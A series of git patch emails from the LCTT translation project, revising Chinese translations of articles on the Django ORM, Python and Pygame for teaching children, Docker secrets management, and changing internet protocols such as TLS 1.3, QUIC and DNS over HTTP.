Python 中比较复杂的部分,使得开发过程更容易。 +Django 的一个强大的功能是它的对象关系映射Object-Relational Mapper(ORM),它允许你就像使用 SQL 一样去和你的数据库交互。事实上,Django 的 ORM 就是创建 SQL 去查询和操作数据库的一个 Python 式方式,并且获得 Python 风格的结果。 我说的_是_一种方式,但实际上,它是一种非常聪明的工程方法,它利用了 Python 中一些很复杂的部分,而使得开发者更加轻松。 -在我们开始去了解 ORM 是怎么工作的之前,我们需要一个去操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建立一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。 +在我们开始去了解 ORM 是怎么工作之前,我们需要一个可以操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建模一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。 -在 Django-ville 中,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。 +在 Django 村里,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图的集合。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。 这是为这个教程事先准备的 `models.py`: @@ -36,23 +36,11 @@ class Post(models.Model):         return self.title ``` -更多的 Python 资源 +现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者(`Author`)和文章(`Post`)。它们都有名字(`name`)或者标题(`title`)。文章有个放内容的大的文本字段,以及用于发布时间和日期的 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。 -* [Python 是什么?][1] +大多数的教程都是从头开始的,但是,在实践中并不会发生这种情况。实际上,你会得到一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。 -* [最好的 Python IDEs][2] - -* [最好的 Python GUI 框架][3] - -* [最新的 Python 内容][4] - -* [更多的开发者资源][5] - -现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者和文章。它们都有名字或者标题。文章为内容设置一个大文本框,以及为发布的时间和日期设置一个 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。 - -大多数的教程都是从 scratch—but 开始的,但是,在实践中并不会发生这种情况。实际上,它会提供给你一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。 - -因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],一个 Web 后端,它有全部列出的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。 +因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],这是一个 Web 后端,它会列出全部的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。 我们可以在 Django 项目的主目录中运行 `python manage.py shell` 去访问 ORM。 @@ -74,13 +62,13 @@ Type "help", "copyright", "credits" or "license" for more information. 它导入了全部的博客模型,因此,我们可以玩我们的博客了。 -首先,我们列出所有的作者。 +首先,我们列出所有的作者: ``` >>> Author.objects.all() ``` -我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了所有我们的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。 +我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了我们所有的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。 ``` >>> Author.objects.all() @@ -88,7 +76,7 @@ Type "help", "copyright", "credits" or "license" for more information.  , '...(remaining elements truncated)...'] ``` -我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息去 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的一个好的选择。解决这个问题的一个方法是使用一个序列(1、2、3...)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不可用,我们可以通过使用 `name` 来操作我们的作者对象。 +我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息才能 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的好选择。解决这个问题的一个方法是使用一个序列(1、2、3 ……)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不好用,我们可以通过使用 `name` 来操作我们的作者对象。 ``` >>> Author.objects.get(name="VM (Vicky) Brasseur") @@ -105,7 +93,7 @@ u'VM (Vicky) Brasseur' 然后,很酷的事件发生了。通常在关系型数据库中,如果我们希望去展示其它表的信息,我们需要去写一个 `LEFT JOIN`,或者其它的表耦合函数,并确保它们之间有匹配的外键。而 Django 可以为我们做到这些。 -在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检查它自己的文章。 +在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检索他自己的文章。 ``` >>> vmb.posts.all() @@ -114,8 +102,8 @@ QuerySet[,  ,  '...(remaining elements truncated)...'] ``` - -We can manipulate `QuerySets` using normal pythonic list manipulations. + +我们可以使用正常的 Python 式的列表操作方式来操作 `QuerySets`。 ``` >>> for post in vmb.posts.all(): @@ -126,20 +114,18 @@ We can manipulate `QuerySets` using normal pythonic list manipulations. Quit making these 10 common resume mistakes ``` -去实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这是非常微妙的。在 SQL 中,你可以有一些选项,比如,`like`、`contains`、和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。 +要实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这有点复杂。在 SQL 中,你可以有一些选项,比如,`like`、`contains` 和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。 -如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我期望在某个地方有一个匹配 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。 +如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我会期望在某个地方有一个匹配的 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。 ``` >>> Author.objects.filter(name__contains="Vic") QuerySet[] ``` -现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “双下划线” 的缩写。这里仅有几个非字母数字字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于不同的过滤关键字的显式分隔。在底层,字符串被这些下划线分割。并且这个标记是分开处理的。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。 +现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “双下划线double underscore” 的缩写。仅有几个非字母数字的字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于显式分隔过滤关键字filter key name的各个部分。在底层,字符串用这些下划线分割开,然后这些标记分开处理。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。 -ORM 是非常强大并且是 Python 特有的。不过,在 Django 的管理网站上我提到过上面的内容。 - -### [django-admin.png][6] +ORM 是非常强大并且是 Python 特有的。不过,还记得我在上面提到过的 Django 的管理网站吗? ![Django Admin](https://opensource.com/sites/default/files/u128651/django-admin.png "Django Admin") @@ -147,13 +133,13 @@ Django 的其中一个非常精彩的用户可访问特性是它的管理界面 ORM,有多强大? -### [django-admin-author.png][7] - ![Authors list in Django Admin](https://opensource.com/sites/default/files/u128651/django-admin-author.png "Authors list in Django Admin") -好吧!给你一些代码去创建最初的模型,Django 转到基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。 +好吧!给你一些代码去创建最初的模型,Django 就变成了一个基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。 -如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。 +如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。 + +(题图  [Christian Holmér][10],Opensource.com 修改. [CC BY-SA 4.0][11]) -------------------------------------------------------------------------------- @@ -165,9 +151,9 @@ Katie McLaughlin - Katie 在过去的这几年有许多不同的头衔,她以 via: https://opensource.com/article/17/11/django-orm -作者:[Katie McLaughlin Feed ][a] +作者:[Katie McLaughlin][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 305bf6d464abacd2f6510eae10442ca4c3f01a7a Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 17 Dec 2017 18:53:19 +0800 Subject: [PATCH 0659/1627] PUB:20171124 An introduction to the Django ORM.md @qhwdw https://linux.cn/article-9154-1.html --- .../20171124 An introduction to the Django ORM.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171124 An introduction to the Django ORM.md (100%) diff --git a/translated/tech/20171124 An introduction to the Django ORM.md b/published/20171124 An introduction to the Django ORM.md similarity index 100% rename from translated/tech/20171124 An introduction to the Django ORM.md rename to published/20171124 An introduction to the Django ORM.md From 703a8bca73651bc2d1fd76bb76047659f132c613 Mon Sep 17 00:00:00 2001 From: runningwater Date: Sun, 17 Dec 2017 19:31:10 +0800 Subject: [PATCH 0660/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ygame are a great pair for beginning programmers.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) rename {sources => translated}/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md (83%) diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/translated/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md similarity index 83% rename from sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md rename to translated/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md index 9c7e916834..63414a6573 100644 --- a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md +++ b/translated/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md @@ -78,15 +78,15 @@ sudo yum install python3-pygame JavaScript 和 Phaser 有着种种的不好,为什么我还继续教授他们?老实说,我考虑了很长一段时间,我在担心着学生学习变量申明提升和变量作用域的揪心。所有我开发出基于 Pygame 和 Python 的课程,随后也开发出一涛基于 Phaser 的。最终,我决定使用 Pablo 预先制定的课程作为起点。 -There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript. +我转用 JavaScript 有两个原因。首先,JavaScript 已经成为正式应用的正式语言。除了 Web 应用外,也可使用于移动和服务应用方面。JavaScript 无处不在,其广泛应用于孩子们每天都能看到的应用中。如果他们的朋友使用 Javascript 来编程,他们很可能也会受影响而使用之。正如我看到了 JavaScript 背后的动力,所以深入研究了可编译成 JavaScript 的替代语言,主要是 Dart 和 TypeScript 两种。虽然我不介意额外的转换步骤,但还是最喜欢 JavaScript。 -In the end, I chose to use Phaser and JavaScript because I realized that the problems could be solved with JavaScript and a bit of work. High-quality debugging tools and the work of some exceptionally smart people have made JavaScript a language that is both accessible and useful for teaching kids to code. +最后,我选择使用 Phaser 和 JavaScript 的组合,是因为我意识到上面那些问题在 JavaScript 可以被解决,仅仅只是一些工作量而已。高质量的调试工具和一些大牛们的人的工作使得 JavaScript 成为教育孩子编码的可用和有用的语言。 -### Final word: Python vs. JavaScript +### 最后话题: Python 对垒 JavaScript -When people ask me what language to start their kids with, I immediately suggest Python and Pygame. There are tons of great curriculum options, many of which are free. I used ["Making Games with Python & Pygame"][25] by Al Sweigart with my son. I also used  _[Think Python: How to Think Like a Computer Scientist][7]_ by Allen B. Downey. You can get Pygame on your Android phone with [RAPT Pygame][26] by [Tom Rothamel][27]. +当家长问我使用的什么语言作为孩子的入门语言时,我会立即推荐 Python 和 Pygame。因为有成千上万的课程可选,而且大多数都是免费的。我为我的儿子选择了 Al Sweigart 的 [使用 Python 和 Pygame 开发游戏][25] 课程,同时也在使用 Allen B. Downey 的 [Python 编程思想:如何像计算机科学家一样思考][7]。在 Android 手机上可以使用 [ Tom Rothame ][27]的[ PAPT Pyame][26] 来安装 Pygame 游戏。 -Despite my recommendation, I always suspect that kids soon move to JavaScript. And that’s okay—JavaScript is a mature language with great tools. They’ll have fun with JavaScript and learn a lot. But after years of helping my daughter’s older brother create cool games in Python, I’ll always have an emotional attachment to Python and Pygame. +那是好事。JavaScript 是一门成熟的编程语言,有很多很多辅助工具。但有多年的帮助大儿子使用 Python 创建炫酷游戏经历的我,依然钟情于 Python 和 Pygame。 ### About the author From c8aecfcd4ff89915f18ddb854effd16ac3e077fb Mon Sep 17 00:00:00 2001 From: runningwater Date: Sun, 17 Dec 2017 19:58:37 +0800 Subject: [PATCH 0661/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E7=94=B3=E9=A2=86?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171214 Peeking into your Linux packages.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171214 Peeking into your Linux packages.md b/sources/tech/20171214 Peeking into your Linux packages.md index 055148f598..333f8b453e 100644 --- a/sources/tech/20171214 Peeking into your Linux packages.md +++ b/sources/tech/20171214 Peeking into your Linux packages.md @@ -1,3 +1,4 @@ +(translating by runningwater) Peeking into your Linux packages ====== Do you ever wonder how many _thousands_ of packages are installed on your Linux system? And, yes, I said "thousands." Even a fairly modest Linux system is likely to have well over a thousand packages installed. And there are many ways to get details on what they are. @@ -117,7 +118,7 @@ Note that the command above would have removed the package binaries along with t via: https://www.networkworld.com/article/3242808/linux/peeking-into-your-linux-packages.html 作者:[Sandra Henry-Stocker][a] -译者:[译者ID](https://github.com/译者ID) +译者:[runningwater](https://github.com/runningwater) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 3932b5e0bc5c84f6e3308984ff07da6b9969d394 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Sun, 17 Dec 2017 22:06:08 +0800 Subject: [PATCH 0662/1627] complete the translation --- ...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 31 +++++++++---------- 1 file changed, 15 insertions(+), 16 deletions(-) diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index 6e12b71fd3..d4fbffde9e 100644 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -2,42 +2,41 @@ Dockers Secrets 管理介绍 ========================= -容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构引入了一种代码与硬件起作用方式的变化 – 它从根本上将其从基础设施中抽象出来。对于容器安全来说,Docker这里有三个关键部分。且他们共同引起了本质上更安全的应用程序。 +容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。 ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) -构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证--通常称为应用程序 secret。我们很高兴介绍Docker Sercets,Docker Secrets 是容器的本土解决方案,是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成 secret 分配功能。 +构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序 涉密数据。我们很高兴可以推出Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据(secret) 分发功能。 -有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的 secret 分布解决方案略显不足,因为他们都是针对静态环境。不幸的是,这导致了应用程序secrets不善管理的增加,使其总是找到安全的,本土的解决方案,比如像GitHub嵌入secrets到版本控制系统,或着同样糟糕是像马后炮一样的定点解决。 +有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据(secret) 分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据(secrets)应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像GitHub嵌入涉密数据(secrets)到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。 -### Docker Secerts 管理介绍 +### Docker 涉密数据(Secrets) 管理介绍 -根本上我们认为,如果有一个标准的接口来访问secrets,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对secrets进行加密;在休息的时候对secrets进行加密;防止无意中泄露最终应用所消耗的secrets;并严格遵守最小特权原则即应用程序只能访问所需的secrets,不能多也不能不少。 +根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。 -通过将secrets整合向docker的业务流程,我们能够在遵循这些确切的原则下为secrets管理问题提供一种解决方案。 +通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。 -下图提供了一个高层次视图,并展示了Docker swarm mode结构是如何将一种新类型的对象安全地传递给我们的容器:一个secret对象。 +下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。 ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) - -在Docker中,一个secret是任意的数据块,比如密码、SSH 密钥、TLS凭证,或者对自然界敏感的每一块数据。当你将一个secret加入swarm(通过执行`docker secret create`)时,docker利用在引导一个新的swarm时自动创建的内置的证书权威,通过相互认证的TLS连接把secret交给swarm管理。 +在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个 涉密数据 加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。 ``` $ echo "This is a secret" | docker secret create my_secret_data - ``` -一旦,secret 达到一个管理节点,它就会被保存在采用NaCl的salsa20poly1305与一个256位的密钥来确保没有任何数据写入磁盘加密的 Raft store 中。 向内部存储写入secrets,保证了数据管理的大量获取。 +一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用NACL 开源加密库中的Salsa20Poly1305加密算生成的256 位密钥加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。 -当 swarm 管理器启动的时,包含secrets的被加密过的Raft日志通过每一个节点唯一的数据密钥进行解密。此密钥和用于与集群其余部分通信的节点的TLS凭据可以使用一个集群范围的密钥加密密钥进行加密,该密钥称为“解锁密钥”,还使用Raft进行传播,将且会在管理器启动的时候被要求。 +当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用Raft进行传播,将且会在管理器启动的时候被使用。 -当授予新创建或运行的服务访问某个secret时,管理器节的其中一个节点(只有管理人员可以访问被存储的所有存储secrets),将已建立的TLS连接发送给正在运行特定服务的节点。这意味着节点自己不能请求secrets,并且只有在管理员提供给他们的secrets时才能访问这些secrets——严格地要求那些需要他们的服务。如果一个服务被删除了,或者被重新安排在其他地方,管理员能够很快的注意到那些不再需要访问将它从内存中消除的secret 的所有节点,且那节点将不能够访问应用程序的secret。 +当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的TLS连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求 涉密数据 的服务。 ``` $ docker service  create --name="redis" --secret="my_secret_data" redis:alpine ``` -未加密的 secret 被安装到 /run/secrests/ 内存文件系统的容器中 +未加密的涉密数据被挂载到一个容器,该容器位于 /run/secrets/ 的内存文件系统中。 ``` $ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets @@ -45,7 +44,7 @@ total 4 -r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data ``` -如果一个服务被删除了,或者被重新安排在其他地方,管理员能够很快的注意到那些不再需要访问将它从内存中消除的secret 的所有节点,且那节点将不能够访问应用程序的secret。 +如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该 涉密数据的节点,这些节点将不再有权访问该应用程序的 涉密数据。 ``` $ docker service update --secret-rm="my_secret_data" redis @@ -55,7 +54,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret cat: can't open '/run/secrets/my_secret_data': No such file or directory ``` -为了获得更多的信息和一些说明如何创建和管理secrets的例子可以看Docker secrets 文档。同时,特别推荐Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和是这一特性成为现实的团队。 +查看Docker sercet文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。 [Get safer apps for dev and ops w/ new #Docker secrets management][5] @@ -66,7 +65,7 @@ cat: can't open '/run/secrets/my_secret_data': No such file or directory ### 通过 Docker 更安全地使用应用程序 -Docker secrets 为开发者设计成更易于使用且IT 运维团队用它来构建和运行更加安全的运用程序。Docker secrets 是首个被设计为既能保持secret安全又能仅在当被需要secret操作的确切容器需要的使用的容器结构。从通过直接在 Docker 数据中心开发部件文件的IT管理员并使用 Docker 组件来定义应用程序和secrets 来看,服务器、secrets、网络和 volumes 将能够安全可靠地使用应用程序。 +Docker 涉密数据旨在让开发人员和IT运营团队轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用Docker Compose定义应用程序和涉密数据,到 IT 管理人员直接在Docker Datacenter中部署Compose文件、涉密数据(涉密数据),networks 和卷 volumes 都将加密、安全地跟应用程序一起传输。 更多相关学习资源: From 8bdb11eb28276f68dbd5295f7735b5c6c8d958cb Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 17 Dec 2017 22:11:40 +0800 Subject: [PATCH 0663/1627] PRF:20171212 Internet protocols are changing.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @qhwdw 终于校对完了。 --- ...0171212 Internet protocols are changing.md | 52 +++++++++---------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/translated/tech/20171212 Internet protocols are changing.md b/translated/tech/20171212 Internet protocols are changing.md index 1d198e2736..10c1e37504 100644 --- a/translated/tech/20171212 Internet protocols are changing.md +++ b/translated/tech/20171212 Internet protocols are changing.md @@ -41,7 +41,7 @@ 值得注意的是,尽管存在这些变化,HTTP/2 并没有出现明显的互操作性问题或者来自网络的冲突。 -#### TLS 1.3 +### TLS 1.3 [TLS 1.3][21] 刚刚通过了标准化的最后流程,并且已经被一些实现所支持。 @@ -57,7 +57,7 @@ TLS 1.3 并不支持那些窃听通讯的特定技术,因为那也是 [一种 在这一点上,TLS 1.3 看起来不会去改变以适应这些网络,但是,关于去创建另外一种协议有一些传言,这种协议允许第三方去偷窥通讯内容,或者做更多的事情。这件事是否会得到推动还有待观察。 -#### QUIC +### QUIC 在 HTTP/2 工作中,可以很明显地看到 TCP 有相似的低效率。因为 TCP 是一个按顺序发送的协议,一个数据包的丢失可能阻止其后面缓存区中的数据包被发送到应用程序。对于一个多路复用协议来说,这对性能有很大的影响。 @@ -77,55 +77,55 @@ iQUIC 使用 TLS 1.3 来为会话建立密钥,然后使用它去加密每个 为满足这一需求,它们有一个提议是 ‘[Spin Bit][27]’ — 这是在报文头中的一个回程翻转的位,因此,可能通过观察它来估算 RTT。因为,它从应用程序的状态中解耦的,它的出现并不会泄露关于终端的任何信息,也无法实现对网络位置的粗略估计。 -#### DOH +### DOH -可以肯定的即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施策略的一个常用手段是通过 DNS 实现的][29](是否代表网络运营商或者一个更大的权威)。 +即将发生的变化是 DOH — [DNS over HTTP][28]。[大量的研究表明,对网络实施政策干预的一个常用手段是通过 DNS 实现的][29](无论是代表网络运营商或者一个更大的权力机构)。 -使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能从其它的通讯中被区别对待;例如,通过利用它的端口号被阻止访问。 +使用加密去规避这种控制已经 [讨论了一段时间了][30],但是,它有一个不利条件(至少从某些立场来看)— 它可能与其它通讯区别对待;例如,通过它的端口号被阻止访问。 -DOH 将 DNS 通讯稍带在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。一个网络希望去阻止访问,仅需要去阻止 DNS 解析就可以做到阻止对特定网站的访问。 +DOH 将 DNS 通讯搭载在已经建立的 HTTP 连接上,因此,消除了任何的鉴别器。希望阻止访问该 DNS 解析器的网络只能通过阻止对该网站的访问来实现。 -例如,如果 Google 在 www.google.com 上部署了它的 [基于 DOH 的公共 DNS 服务][31] 并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止的网络,它将被 Google 有效的全部阻止(向他们提供的服务致敬!)。 +例如,如果 Google 在 www.google.com 上部署了它的 [基于 DOH 的公共 DNS 服务][31],并且一个用户配置了它的浏览器去使用它,一个希望(或被要求的)被停止访问该服务的网络,将必须阻止对 Google 的全部访问(向他们提供的服务致敬!)(LCTT 译注:他们做到了)。 -DOH 才刚刚开始,但它已经引起很多人的兴趣和一些部署的声音。通过使用 DNS 来实施策略的网络(和政府机构)如何反应还有待观察。 +DOH 才刚刚开始,但它已经引起很多人的兴趣,并有了一些部署的传闻。通过使用 DNS 来实施政策影响的网络(和政府机构)如何反应还有待观察。 阅读 [IETF 100, Singapore: DNS over HTTP (DOH!)][1] -#### 骨化和润滑 +### 僵化和润滑 -让我们返回到协议变化的动机,其中一个主题是吞吐量,协议设计者们遇到的越来越多的问题是怎么去假设关于通讯的问题。 +让我们返回到协议变化的动机,有一个主题贯穿了这项工作,协议设计者们遇到的越来越多的问题是网络对流量的使用做了假设。 -例如,TLS 1.3 有一个使用旧版本协议的中间设备的最后结束时间的问题。gQUIC 黑名单控制网络的 UDP 